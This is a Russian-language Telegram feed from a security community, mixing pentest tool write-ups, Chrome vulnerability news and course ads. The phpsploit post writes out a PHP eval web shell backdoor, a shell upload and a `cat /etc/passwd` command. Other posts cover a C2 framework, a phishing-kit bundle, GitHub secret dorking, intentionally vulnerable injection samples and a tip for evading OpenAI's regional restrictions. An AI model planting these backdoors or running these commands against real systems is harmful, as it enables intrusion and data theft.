Codeby
35.9K subscribers
1.48K photos
92 videos
12 files
7.41K links
Блог сообщества Кодебай

Чат: @codeby_one
Форум: codeby.net
Обучение: codeby.school
Пентест: codeby.one
CTF: hackerlab.pro

VK: vk.com/codeby
YT: clck.ru/XG99c

Сотрудничество: @KinWiz

Реклама: @Savchenkova_Valentina
Download Telegram
BCHackTool

BCHackTool — это программа, в которой собрано большое количество популярных утилит. В эту подборку вошла уже известная нам утилита как Zphisher. Утилита также ориентирована для Termux.

💡Характиристика:
⏺️Компактность - Популярные утилиты в одном месте
⏺️Удобство - Утилита сама устанавливает утилиты
⏺️Простота - Утилита имеет некую удобную оболочку для взаимодейтсвия

📎Установка:
git clone https://github.com/ByCh4n/BCHackTool.git

cd BCHackTool/

chmod +x bchacktool.sh


Использование:
sudo bash ./bchacktool.sh

Выбираем нужную нам утилиту.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍64
Готовы пройти собеседование на OSINT-специалиста с Катей Тьюринг?

🟧 СЕГОДНЯ в 19:00 (мск)
🟧 Регистрация

Что обсудим?
🟧Как читать OSINT-вакансии между строк и где их искать
🟧Типичные ошибки кандидатов на собесах — и как их избежать
🟧Что реально проверяют: от теории до практических кейсов

Не пропустите! 😎
🟧 Регистрируйтесь здесь и получите ссылку на эфир в ответном письме.

🚀 Трудности с регистрацией? Пишите @Codeby_Academy
Please open Telegram to view this post
VIEW IN TELEGRAM
8👍8🔥5😁3
▶️ Друзья, уже через час стартует бесплатный вебинар «Как пройти собеседование на OSINT-специалиста: от резюме до реальных кейсов» с Катей Тьюринг!

Вы еще успеваете присоединиться! 😎
🔴 Регистрируйтесь здесь и получите ссылку на эфир в ответном письме.

🚀 Трудности с регистрацией? Пишите @Codeby_Academy
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10🔥95😁1
AdaptixC2

Adaptix — это инструмент, который помогает специалистам по безопасности тестировать системы на уязвимости. Он позволяет им эмулировать действия злоумышленников после того, как они получили доступ к системе.

💡Характиристика:
Гибкость - Утилита позволяет операторам настраивать профили в формате JSON для управления аутентификацией и конфигурацией серверных ответов.
Архитектура сервер/клиент - Поддержка многопользовательского взаимодействия.
Кроссплатформенный GUI - Клиентская часть написана на C++ с использованием QT (т.е он доступен для Linux,Windows,MacOS)
Шифрование - Все коммуникации между сервером и клиентом полностью зашифрованы.
Расширяемость клиента - Возможность добавления новых инструментов.
Хранение задач и работ - Удобное управление задачами и работами.
Поддержка прокси - Socks4, Socks5 и Socks5 Auth.
Портовое переадресация - Локальная и обратная поддержка.
Поддержка BOF - Возможность использования BOF (Binary Object Format).
Мониторинг состояния агентов - Проверка состояния агентов и контроль времени работы.

📎Установка:
git clone https://github.com/Adaptix-Framework/AdaptixC2.git

cd AdaptixC2

sudo apt install mingw-w64 make

wget https://go.dev/dl/go1.24.4.linux-amd64.tar.gz -O /tmp/go1.24.4.linux-amd64.tar.gz 

sudo tar -C /usr/local -xzf /tmp/go1.24.4.linux-amd64.tar.gz

sudo ln -s /usr/local/go/bin/go /usr/local/bin/go


📌Использование:
⏺️Сборка серверной части:
make server

make extenders

⏺️Запуск:
cd dist

openssl req -x509 -nodes -newkey rsa:2048 -keyout server.rsa.key -out server.rsa.crt -days 3650

./adaptoxserver --profile profile.json

Сборка клиентской части:
make client
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
13👍12🔥5🏆1
Graudit: инструмент для поиска уязвимостей в коде
Graudit (Grep Rough Audit) — это инструмент для статического анализа безопасности исходного кода, который использует сигнатурный поиск на основе регулярных выражений. Он помогает находить потенциальные уязвимости, такие как SQL-инъекции, XSS, RCE, path traversal и другие. Graudit отличается простотой, высокой скоростью работы и поддержкой множества языков программирования.


🟧 Установка Graudit
Graudit можно установить из репозитория:
git clone https://github.com/wireghoul/graudit
cd graudit
sudo cp graudit /usr/local/bin/ # Добавляем в PATH
Проверяем:
graudit -v

🟧 Как работает Graudit?
Graudit анализирует исходный код, используя предопределённые наборы правил (сигнатуры), которые соответствуют распространённым уязвимостям.
Поддерживаемые языки:
🟧 PHP, Java, Python, Ruby
🟧 C/C++, Go, JavaScript
🟧 Bash, Perl, ASP
Файлы с сигнатурами хранятся в папке /signatures/.

🟧 Примеры использования
1. Базовое сканирование
Проверим PHP-код на уязвимости:
graudit -d php ./project/

Вывод будет содержать строки кода, похожие на уязвимые паттерны.
2. Поиск SQL-инъекций
graudit -d sql ./project/
3. Проверка JavaScript (Node.js) на XSS
graudit -d js ./app.js


🟧 Пример уязвимого кода и его анализ
🟧 PHP: SQL-инъекция
// Уязвимый код
$user = $_GET['username'];
$query = "SELECT * FROM users WHERE name = '$user'";
$result = mysqli_query($conn, $query);

Graudit обнаружит эту уязвимость, так как в сигнатурах PHP есть правило для SQL-запросов с прямым включением пользовательского ввода.

🟧 Python: Command Injection
import os
user_input = input("Enter filename: ")
os.system(f"cat {user_input}") # Уязвимость!
Graudit выдаст предупреждение, так как os.system с внешними данными — это риск RCE.

🟧
Расширение возможностей Graudit
Можно добавлять свои сигнатуры в /signatures/custom.db:
Пример правила для поиска опасных функций в Pythonlabel: Dangerous Python eval()pattern: eval\(.*\$
Теперь при сканировании Python-кода Graudit будет искать eval().

🟧 Используйте Graudit в связке с:
🟧 Bandit (для Python)
🟧 Semgrep (для глубокого анализа)
🟧 SonarQube (для комплексного сканирования)
Please open Telegram to view this post
VIEW IN TELEGRAM
👍135🔥5
🟧Перед вами профессиональный кроссворд для пентестеров и security-специалистов. Здесь собраны ключевые термины из мира взлома и защиты.
Решите его и напишите спрятанное слово в комментариях!
Please open Telegram to view this post
VIEW IN TELEGRAM
4018🔥11👍8😁1😱1
Intellifuzz

Intellifuzz - умная AI-powered обёртка для веб-фаззера ffuf. Автоматически анализирует цель и предлагает оптимальные расширения файлов для фаззинга, используя силу искусственного интеллекта от ведущих провайдеров.

💡Харакетеристики:
⏺️Множественные AI-провайдеры - OpenAI, Anthropic Claude, Ollama (локально), OpenRouter.
⏺️Управление конфигурацией - YAML-конфиг с интерактивной настройкой.
⏺️Интеграция с ffuf - Пропускает все параметры ffuf без изменений.
⏺️Умные предложения - Контекстно-зависимые рекомендации расширений файлов.
⏺️Гибкая аутентификация - API-ключи, переменные окружения, локальные модели.

📎Установка:
git clone https://github.com/cansolele/intellifuzz

cd intellifuzz

pip install -r requirements.txt

Заходим на сайт openAI под другой страной и в API Platforms, в настройках пользвателя cоздаём секретный ключ, называем проект как угодно и вставляем его в файл config.yaml


📌Использование:
python intellifuzz.py https://google.com


Удовольствие такое не бесплатное, за использование API просят плату
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥97👍7👎4
Как защитить пароль от реверса: антиотладка, XOR и прыжки в бездну

Если в вашей программе есть CMP + JE — её уже взломали.
Но что если заменить проверку пароля на хаотичные прыжки, шифрование и ложные исключения?

В статье разберем нестандартные способы защиты:
⚪️Пароль = ключ дешифровки — без него код просто не соберётся.
⚪️Ловушки для отладчика — SEH, антитрассировка и ложные CMP.
⚪️Самомодифицирующийся код — программа меняет себя при каждом запуске.
⚪️Пароль из кусочков — собирается только в памяти и никогда не хранится целиком.

📍Чем больше хаоса, тем меньше шансов у реверсера.

➡️Читайте подробнее в новой статье!
Please open Telegram to view this post
VIEW IN TELEGRAM
40👍18🔥96
📱 Google выпустил срочное обновление, закрывающее шесть критических уязвимостей в браузере Chrome. Среди них особую опасность представляет CVE-2025-6558 (оценка 8.8 по шкале CVSS), которая уже активно используется злоумышленниками в реальных атаках.

Суть проблемы кроется в компонентах ANGLE (Almost Native Graphics Layer Engine) и GPU браузера. ANGLE выполняет важную функцию - это промежуточный слой между движком рендеринга Chrome и графическими драйверами устройства. Ошибка в проверке входящих данных позволяет злоумышленникам осуществить так называемый «побег из песочницы».


🟧 Что это означает на практике?
- Достаточно просто открыть специально созданную веб-страницу
- Никаких дополнительных действий от пользователя не требуется
- Атакующий получает возможность выйти за пределы изолированной среды браузера
- Появляется риск полного компрометирования системы

🟧 Особую тревогу вызывает факт обнаружения этой уязвимости специалистами Google Threat Analysis Group (TAG) - подразделения, которое занимается расследованием сложных кибератак, часто связанных с деятельностью государственных хакерских группировок. Уязвимость была зафиксирована 23 июня 2025 года, но Google подтверждает, что эксплойты уже используются в реальных атаках.

🟧Это уже пятая критическая уязвимость в Chrome с начала 2025 года, которую эксплуатируют злоумышленники:
🟧CVE-2025-2783 - ошибка в логике на пересечении Chrome и операционной системы Windows, которая позволяет обойти защиту песочницы браузера.
🟧CVE-2025-4664 - случай недостаточного обеспечения соблюдения политики в компоненте под названием Loader.
🟧CVE-2025-5419 - уязвимость чтения и записи за пределами в движке V8 JavaScript и WebAssembly.
🟧CVE-2025-6554 - недостаток путаницы типов в движке V8 JavaScript и WebAssembly.
🟧Текущая CVE-2025-6558 - неправильная проверка ненадежного ввода в компонентах ANGLE и GPU браузера.

🟧 Что делать?
- Обновите Chrome до версии 38.0.7204.157/.158 (для Windows и macOS) и 138.0.7204.157 (для Linux)
Проверить наличие обновлений можно через меню: «Еще» > «Справка» > «О Google Chrome»

- Не забывайте, что аналогичные обновления необходимо устанавливать и для других браузеров на базе Chromium: Edge, Brave, Opera, Vivaldi
Please open Telegram to view this post
VIEW IN TELEGRAM
12👍6🔥4
На днях сеть алкомаркетов «Винлаб» столкнулась с беспрецедентным инцидентом. Приостановлена работа всех магазинов «Винлаб».

Причиной стал масштабный взлом корпоративных серверов, который продолжает парализовывать бизнес-процессы компании.

Последствия атаки:
🟣Все розничные точки остаются закрытыми, на дверях размещены уведомления о «технических работах» без конкретных сроков возобновления деятельности
🟣Официальный сайт сети недоступен
🟣Клиенты столкнулись с «зависшими» заказами — оплаченный заказ не доставляется и статусы не обновляются

❗️Владелец сети (Novabev Group) пока не даёт официальных комментариев. По данным инсайдеров, хакеры потребовали выкуп, но руководство отказалось выполнять их условия.
Please open Telegram to view this post
VIEW IN TELEGRAM
👾21🔥11👍43🤔3😁1
pspy: Утилита для мониторинга процессов без привилегий root

pspy — это лёгкий и мощный инструмент с открытым исходным кодом, который позволяет отслеживать процессы на Linux-системах без необходимости обладания правами root. Это идеальный инструмент для анализа выполнения задач в реальном времени, поиска уязвимостей и оптимизации системных процессов.


Основные возможности pspy
➡️ Мониторинг процессов в реальном времени:
• Улавливает все запуски команд и скриптов.
• Фиксирует информацию о процессах, выполняемых пользователями и системными службами.
➡️ Отслеживание задач cron:
• Помогает выявить выполняемые задачи cron и понять их расписание.
• Удобен для тестирования безопасности и выявления слабых мест.
➡️ Поддержка работы без root:
• Не требует установки или повышения привилегий.
• Идеален для использования в условиях ограниченного доступа.
➡️ Совместимость с различными архитектурами:
• Доступен для x64, x86, ARM и других платформ.
➡️ Лёгкость и портативность:
• Выполняется как один бинарный файл без дополнительных зависимостей.

⬇️ Установка и использование

1️⃣ Скачивание pspy:
Загрузите подходящую версию с GitHub:
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64


2️⃣ Запуск мониторинга:
Для наблюдения за процессами выполните:
./pspy64


3️⃣ Фильтрация событий:
Используйте встроенные флаги и фильтры, чтобы сузить список отслеживаемых процессов:
./pspy64 | grep cron
Please open Telegram to view this post
VIEW IN TELEGRAM
14👍10🔥9🤔1
👍 GitDorker

Инструмент, написанный на Python, который использует GitHub Search API и обширный список GitHub-дорков, составленных из различных источников, для поиска конфиденциальной информации, хранящейся на GitHub.

Основной целью является предоставление пользователю чистой и адаптированной поверхности атаки для сбора конфиденциальной информации на GitHub. GitDorker можно использовать с дополнительными инструментами, такими как GitRob или Trufflehog, для получения более точных результатов.

❗️Инструмент из-за использования GitHub Search API ограничен 30 запросами в минуту. Для предотвращения сбоев в него встроена функция ожидания после каждых 30 запросов.

📁 В папке Dorks находится список дорков. Рекомендуется использовать файл medium_dorks.txt при работе с инструментом. Данный файл содержит в общей сложности 240 отдельных дорков с различных ресурсов.

Для работы с инструментом также потребуется персональный токен GitHub. Установка осуществляется через следующие команды:
git clone https://github.com/obheda12/GitDorker.git
cd GitDorker
pip3 install -r requirements.txt


✔️Пример использования
Представленный ниже запрос будет искать информацию связанную с "codeby".
python3 GitDorker.py -tf TOKENSFILE -q codeby -d Dorks/DORKFILE -o output.txt

⏺️-tf импорт токена;
⏺️-q указывает на сам запрос;
⏺️-d содержит путь до словаря с дорками;
⏺️-o выходной файл с результатами.

Кроме того можно указать дополнительную информацию с помощью флагов -org, -u и т.д., чтобы сузить диапазон поиска и увеличить количество шансов на успех.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍139🔥6
Extirpater

Extirpater - мощный инструмент для полного уничтожения данных на Android-устройстве без возможности восстановления.

💡Харакетеристики:
В отличие от стандартного удаления, при котором файлы просто удаляются из индекса файловой системы, Extirpater гарантирует, что ваши данные не подлежат возврату. Он заполняет свободное пространство случайными данными, а затем полностью очищает его, делая восстановление невозможным.

📎Установка:
👩‍💻Проект доступен в магазине F-droid:
https://f-droid.org/packages/us.spotco.extirpater/

👩‍💻Исходный код:
https://github.com/divested-mobile/extirpater


📌Использование:
Выбирете Primary или Secondary Storage и нажмите кнопку Start.
Please open Telegram to view this post
VIEW IN TELEGRAM
10👍9🔥6
phpsploit: Мощный фреймворк для пентеста PHP-приложений

phpsploit - это продвинутый инструмент с открытым исходным кодом, предназначенный для тестирования безопасности веб-приложений на PHP. Он сочетает в себе функции бекдора, шелл-клиента и фреймворка для эксплуатации уязвимостей.


Основные возможности:
➡️ Удалённое выполнение кода (RCE): позволяет загружать и выполнять произвольный PHP-код на целевой системе, поддерживает интерактивную командную строку.
➡️ Стелс-режим: минимизирует следы присутствия в логах и файловой системе, поддерживает шифрование трафика.
➡️ Гибкость и модульность: встроенные модули для сканирования и эксплуатации, возможность написания собственных плагинов на Python.
➡️ Поддержка сессий и многопоточности: сохранение сессий для возобновления работы, параллельное выполнение задач.
➡️ Кросс-платформенность: работает на Linux, Windows и macOS.

⬇️Установка и использование:

1️⃣ Установка phpsploit:
git clone https://github.com/nil0x42/phpsploit.git
cd phpsploit
pip install -r requirements.txt
./phpsploit


2️⃣ Настройка подключения:
set TARGET http://example.com/vulnerable.php
set BACKDOOR <?php eval($_POST['cmd']); ?>
run exploit


3️⃣ Основные команды:
exploit - запуск эксплойта
shell - интерактивная оболочка
scan file - поиск файлов
download - скачивание файлов
sessions - управление сессиями


4️⃣ Пример эксплуатации:
upload /path/to/shell.php /var/www/html/shell.php
exec "whoami"
exec "cat /etc/passwd"
scan /var/www/html


Применение в безопасности:
- Тестирование на уязвимости RCE в PHP-приложениях
- Пост-эксплуатация после успешного взлома
- Аудит веб-серверов на наличие бекдоров
Please open Telegram to view this post
VIEW IN TELEGRAM
👍127🔥5👎1
Взламываем мифы о безопасности Android

Знаете ли вы:

🟧85% мобильных приложений содержат критические уязвимости (отчет OWASP 2024)
🟧Каждое 3-е приложение в Google Play имеет уязвимости, связанные с хранением данных (исследование Positive Technologies).
🟧Атаки на Android выросли на 50% за последние 2 года — (данные Kaspersky Lab), пора научиться защищаться!

На курсе Анализ защищённости приложений Андроид за 3,5 месяца освоите реальные инструменты защиты:⬇️
Разберете Android-приложения изнутри
Освоите инструменты статического и динамического анализа
Научитесь находить и устранять уязвимости на практике

21 июля старт обучения:
мини-группа до 8 человек + персональный разбор заданий

🟠Успейте записаться

Курс создан для:
Сотрудников подразделений ИБ для повышения квалификации, новичков в сфере анализа мобильных приложений, реверс-инженеров для повышения квалификации в области мобильных приложений

🚀 По всем вопросам пишите @Codeby_Academy
Please open Telegram to view this post
VIEW IN TELEGRAM
👍137🔥6
🚩 Новые задания на платформе HackerLab!

🌍 Категория ВебPDF-библиотека

🎢 Категория РазноеРекурсия

Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍65
Пентестеру важно понимать DNS и его записи, чтобы выявлять инфраструктуру, скрытые сервисы и уязвимости, проверять защиту почты и находить возможности для атак. Это помогает эффективно планировать атаки и искать слабые места в безопасности.
🔥27👍128